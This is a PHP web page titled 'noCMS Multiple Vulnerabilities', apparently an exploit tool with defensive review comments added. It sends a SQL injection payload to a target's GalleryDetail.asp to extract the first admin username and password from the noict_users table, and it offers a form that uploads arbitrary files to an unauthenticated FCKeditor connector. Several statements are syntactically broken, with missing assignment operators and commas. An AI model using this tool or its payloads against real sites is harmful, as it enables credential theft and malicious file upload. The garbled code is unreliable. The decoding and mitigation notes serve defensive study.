<?php

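/**
 * Fetch a URL with cURL and return the response body.
 *
 * The listing had lost its `=` and `,` tokens, so the function did not parse;
 * they are restored here. The address is built from the `add` query parameter
 * read later in this file, so the transfer is pinned to HTTP and HTTPS. This
 * keeps a caller-supplied value from selecting another cURL protocol handler
 * such as file:// or gopher://.
 *
 * @param string $adress URL to request.
 * @return string|bool Response body, or false when the transfer fails.
 */
function download($adress)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $adress);
    // Return the body from curl_exec() instead of printing it.
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // Keep response headers out of the returned string.
    curl_setopt($curl, CURLOPT_HEADER, 0);
    // Only web protocols are needed here; refuse everything else.
    curl_setopt($curl, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    $html = curl_exec($curl);
    curl_close($curl);
    return $html;
}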

// Request handler: runs only when the `add` query parameter is present.
// NOTE(review): the assignment operators and argument commas appear to have
// been lost from this listing; the statements below are kept exactly as found.
//
// Defender's reading of what follows:
//  - `add` is used as the base address of an outgoing request with no
//    validation, so whoever hosts this script also exposes a server-side
//    request primitive.
//  - The `id` parameter sent to GalleryDetail.asp decodes to
//    `1 or 1=(CHAR(66)+CHAR(82)+(select top 1 user_username+CHAR(47)+user_password from noict_users))--`.
//    CHAR(66)/CHAR(82) are "B"/"R" (the marker searched for below) and
//    CHAR(47) is "/" (the separator between the two columns).
//  - In web-server logs this appears as a GalleryDetail.asp request whose `id`
//    value contains `select`, `CHAR(` and a trailing `--`.
//  - Application-side fix: bind `id` as an integer parameter instead of
//    concatenating it into the query. Presumably the value leaks through a
//    database error message - confirm; if so, suppress detailed error output.
if (isset(
$_GET['add']))
{
    
// Target base address, taken from the query string as-is.
$add $_GET['add'];
    
    
// Injection request URL (decoded form is in the header comment above).
$exp_add $add."/GalleryDetail.asp?id=1%20or%201%3D%28CHAR%2866%29%2bCHAR%2882%29%2b%28select%20top%201%20user_username%2bCHAR%2847%29%2buser_password%20from%20noict_users%29%29--";
    
// Response body, or false if the transfer failed; the result is not checked.
$html download($exp_add);
    
// strrchr() uses only the first character of a multi-character needle, so this
// keeps the text from the last "B" in the response, not the last "BR".
$text strrchr($html,"BR");
    
    
// Lazy match from just after an "R" up to the next single quote, across lines.
// `\B` is the regex non-word-boundary assertion, not a literal "B".
// NOTE(review): probably meant to anchor on the literal marker "BR" - confirm.
$pattern "#(?s)(?<=\BR).+?(?=\')#";
    
preg_match_all($pattern$text$m);

    

    
// First match is read without checking that anything matched. The value comes
// from the remote response, so it is untrusted when rendered further down.
$up =$m[0][0];
    
$site_add $add;
    
// FCKeditor ASP connector called with Command=FileUpload, Type=Image and
// CurrentFolder=/. The page treats it as reachable without a session
// (inferred - confirm). Mitigation: remove or disable unused FCKeditor
// connectors, require authentication on the rest, and enforce upload
// type checks server-side.
$upload_add $add."/modir/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=%2F";
}
?>

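<!DOCTYPE html>
<html>
<head>
<title>noCMS Multiple Vulnerabilities</title> 
<style>
body {
background-color: black;
color: white;
}
</style>
<script>
var cnt = 0;
function inform()
{
cnt++;
if (cnt>1) alert("Upload complete");
}
</script>
</head>
<body>
<p align="center"><font size="6" color="white">noCMS Multiple Vulnerabilities</font></p>
<p><font size="4" color="white" >Sql Injection:</font></p>
<form name="input" action="" method="get">
<?php /* $add exists only after a submit; fall back to an empty string so the first page load does not read an undefined variable. */ ?>
<font size="3" color="white" >URL:</font><input type="text" name="add" value="<?php echo htmlspecialchars(isset($add) ? $add : '', ENT_QUOTES, 'UTF-8'); ?>">
<input type="submit" value="Submit">
</form>

<?php if (isset($_GET['add'])) { ?>
<p><font size="3" color="white" >Username and password </font></p>

<?php /* $up is text cut out of the remote response, so it is attacker-influenced; escape it before it reaches the browser. */ ?>
<font size="3" color="white" >username/password: <?php echo htmlspecialchars(isset($up) ? $up : '', ENT_QUOTES, 'UTF-8'); ?> </font><br/>


<p><font size="4" color="white"> FCK Editor: </font></p>
<iframe id="myframe" name="myframe" style="display:none" onload="inform();"></iframe>
<form enctype="multipart/form-data" action="<?php echo htmlspecialchars($upload_add, ENT_QUOTES, 'UTF-8'); ?>" method="POST" target="myframe">
<p><font size="3" color="white">Browse for a file to upload</font></p>
<input type="file" name="NewFile" />
<input type="submit" value="Upload" />
</form>
<div id='uploadresult'></div>
<?php /* $NewFile is never assigned in this script (the form posts straight to the remote host), so it is treated as empty; the whole string is escaped because it is built from the `add` parameter. */ ?>
<font size="3" color="white" >Your file add: </font><?php echo htmlspecialchars('http://' . $upload_add . '/userfiles/image/' . (isset($NewFile) ? $NewFile : ''), ENT_QUOTES, 'UTF-8'); ?> <br/>
<?php } /* closes the isset($_GET['add']) block opened above; the original left it open */ ?>

</body>
</html>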